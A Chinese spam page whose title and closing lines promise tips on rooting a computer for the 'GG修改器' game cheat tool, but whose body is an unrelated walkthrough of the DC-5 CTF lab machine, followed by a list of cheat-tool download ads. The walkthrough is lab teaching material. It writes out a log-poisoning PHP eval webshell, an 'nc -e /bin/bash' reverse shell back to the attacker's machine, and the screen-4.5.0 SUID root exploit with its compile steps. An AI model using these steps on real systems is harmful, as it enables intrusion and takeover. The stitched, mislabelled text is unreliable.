各位游戏大佬大家好,今天小编为大家分享关于gg修改器如何用电脑root_电脑可以使用gg修改器吗的内容,轻松修改游戏数据,赶快来一起来看看吧。
DC-5
1.取得靶机,将靶机复制在自己电脑上,打开靶机
选择编辑此虚拟机,点击网络配适器,选择NAT模式然后确定
开启此虚拟机
到这步后我们开启kali虚拟机,同样选择编辑此虚拟机,点击网络配适器,选择NAT模式然后确定
打开kali虚拟机,其密码为kali
我们先获取root权限,输入su root,password为123456(Linux内输入password是看不见的)
先用ifconfig查看kali的ip地址为192.168.126.129
我们用nmap扫描收集信息,输入nmap -sP 192.168.126.0/24 -oN nmap.sV
得到靶机ip:192.168.126.132,对其进行端口扫描
可以看到开放了80端口和111端口,111端口是RPC服务,感觉没有什么可以利用的点,我们去浏览器访问80端口试试(可以打开kali自带的火狐浏览器,使用kali自带浏览器前需要打开burpsuit,也可以用自己电脑的浏览器)
输入刚刚获得的靶机ip,例如我的就是http://192.168.126.132
发现这是一个动态页面,可以尝试去提交一些东西。
我们点击右上角Contact,往下滑发现可以输入
提交后可以发现,本人电脑的Microsoft Edge因为改成了翻译系统,一般情况会显示DC-5 is alive
扫描web目录,输入dirb http://192.168.126.132
很可惜此处没有太多有价值的东西,继续浏览可以发现contact可以发现年份会随着页面刷新而刷新
之前在thinkyou.php中看到了这种情况(网页刷新一次,年份都会发生变化),因此我们猜测thinkyou.php调用了footer.php,于是想到了文件包含漏洞,输入footer.php试试
看见页面变化,我们回到kali,用kali自带的burpsuite进行抓包
关于burpsuite的详细配置教程我放在另外一个文档里面,没有配置的小伙伴可以先配置一下
打开burpsuite后,返回浏览器界面
在开着intercept on的同时刷新浏览器页面(回到浏览器按下f5)burp会自动抓包
点击Action,选择send to Repeater发送到Repeater
利用access.log。抓包在burpsuite-repeater中,把url修改为一句话木马 Get <?php phpinfo();?> ,回显400 bad request
返回浏览器查看,哭看见页面发生变化
滑到最底下是这样的,可以看见显示了php信息,意识到可以通过这个方式写入木马
我们返回burpsuite,写入一句话木马 GET <?php @eval($_POST[’1234’];?> .
(注意,这里的POST[’’]里面的内容是可以更改的,也就是之后用蚁剑连接的密码
接着我们使用蚁剑连接,此处我的蚁剑是windows版本的,所以密码就是POST内的内容1234
点击添加数据
点击测试连接,可以看见连接成功
我们回到kali,输入nc -lvvp 1234开启这个端口的监听
然后在蚁剑中,点击右键,选择虚拟终端,输入nc -e /bin/bash 192.168.126.129 1234进行shell反弹
可以在kali中看见成功
返回kali交互式 输入python -c ’import pty;pty.spawn(“/bin/bash”)’
使用find / -perm -4000 2>/dev/null查找具有SUID权限的文件,发现screen-4.5.0。
使用searchsploit查找该命令漏洞:searchsploit screen 4.5.0 -w
两个文件是相同的,41152.txt是告诉你怎么做,之前的靶机也出现过,显然41154.sh已经把文件给了,所以选择下载41154.sh
发现有两个漏洞
先查看第一个
将第一个复制到桌面
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh
查看该文件
发现其在 /tmp 路径下编译了两个 c,并执行了若干命令
按照脚本提示,先将第一部分内容写到libhax.c中(一共有三个部分)
第一步在桌面创建一个文件夹存放三个部分的脚本
使用命令vim创建第一个libhax.c
然后编译这个脚本
gcc -fPIC -shared -ldl -o libhax.so libhax.c
、
使用vim命令创建第二个rootshell.c,复制粘贴完内容后按下esc输入:wq保存退出
再编译
gcc -o rootshell rootshell.c
最后一个部分dc5.sh同理,但是需要注意的是下面需要转换一下格式
执行完命令后,可以看见在桌面home/dc-5文件夹有五个文件
将带有.c的文件删除,在kali中使用rm命令
再回到文件夹内可以看见
然后我们回到中国蚁剑,将文件上传到tmp文件里面,需要注意的是我们一定要讲文件传到根目录下,而不是var,/var是源码
然后重命名,将路径去掉
回到kali反弹的shell(步骤和之前一样),进入到天麻片、目录里面
然后为dc5.sh添加可以执行权限,输入chmod +x dc5.sh
验证权限,切换到/root根目录下找到flag,渗透成功
以上就是关于gg修改器如何用电脑root_电脑可以使用gg修改器吗的全部内容,游戏大佬们学会了吗?
gg修改器 已root_Gg修改器吧 分类:免root版 4,892人在玩 各位游戏大佬大家好,今天小编为大家分享关于gg修改器 已root_Gg修改器吧的内容,轻松修改游戏数据,赶快来一起来看看吧。 首先,你的手机得支持OTG功能,也就是手机能支持外接U盘……
下载gg修改器 有免root吗_gg修改器免root怎么用? 分类:免root版 4,311人在玩 各位游戏大佬大家好,今天小编为大家分享关于gg修改器 有免root吗_gg修改器免root怎么用?的内容,轻松修改游戏数据,赶快来一起来看看吧。 地煞来袭,丰富奖励! 全新版本迎来地煞……
下载gg修改器怎么买root,软件下载:GG修改器助你轻松获取Root权限 分类:免root版 3,338人在玩 GG修改器是一款广受欢迎的Android游戏修改器,可以帮助你轻松获取Root权限。如果您需要在您的设备上运行某些应用程序或进行更多高级设置,则需要root权限。但是,对于许多用户来说……
下载gg修改器汉化免root_gg修改器汉化最新版 分类:免root版 6,124人在玩 各位游戏大佬大家好,今天小编为大家分享关于gg修改器汉化免root_gg修改器汉化最新版的内容,轻松修改游戏数据,赶快来一起来看看吧。 据官方介绍,在过去的8个月中,Android Studi……
下载旧版gg修改器免root_Gg修改器最新版 分类:免root版 5,062人在玩 各位游戏大佬大家好,今天小编为大家分享关于旧版gg修改器免root_Gg修改器最新版的内容,轻松修改游戏数据,赶快来一起来看看吧。 [PConline 应用]最近某APP删除用户相册里保存的截……
下载gg修改器不用root的,软件下载:GG修改器,无需Root权限 分类:免root版 4,849人在玩 GG修改器是一款无需Root权限的游戏修改工具。它可以帮助用户在游戏中轻松修改各种数值,比如金币、经验值、等级等,从而让玩家更加轻松愉悦地享受游戏。GG修改器不仅支持单机游戏的……
下载gg修改器root空间_gg修改器以及各类免root空间 分类:免root版 6,027人在玩 各位游戏大佬大家好,今天小编为大家分享关于gg修改器root空间_gg修改器以及各类免root空间的内容,轻松修改游戏数据,赶快来一起来看看吧。 愚公移山游戏中,就算是最便宜的草丛,……
下载GG修改器免root虚拟_gg修改器免root虚拟空间怎么启动 分类:免root版 4,615人在玩 各位游戏大佬大家好,今天小编为大家分享关于GG修改器免root虚拟_gg修改器免root虚拟空间怎么启动的内容,轻松修改游戏数据,赶快来一起来看看吧。 IT之家(www.):如果把这十个功……
下载gg修改器免root无广告,下载一个功能强大的gg修改器,无需root且不含广告 分类:免root版 3,901人在玩 如果你是一位游戏爱好者,那么你一定知道gg修改器。这个工具可以让你在游戏中获取更多资源或者获得更高的成就等级。但是,很多时候修改器需要root才能使用,并且经常会有烦人的广告……
下载gg修改器怎样免root版,下载免root版GG修改器,轻松修改游戏数据 分类:免root版 3,942人在玩 在玩游戏的过程中,有时候会遇到一些棘手的问题,比如游戏进度慢、金币不够等等。这时候,我们就需要使用一款好用的游戏修改器来解决这些问题。而GG修改器便是其中一款非常流行的工……
下载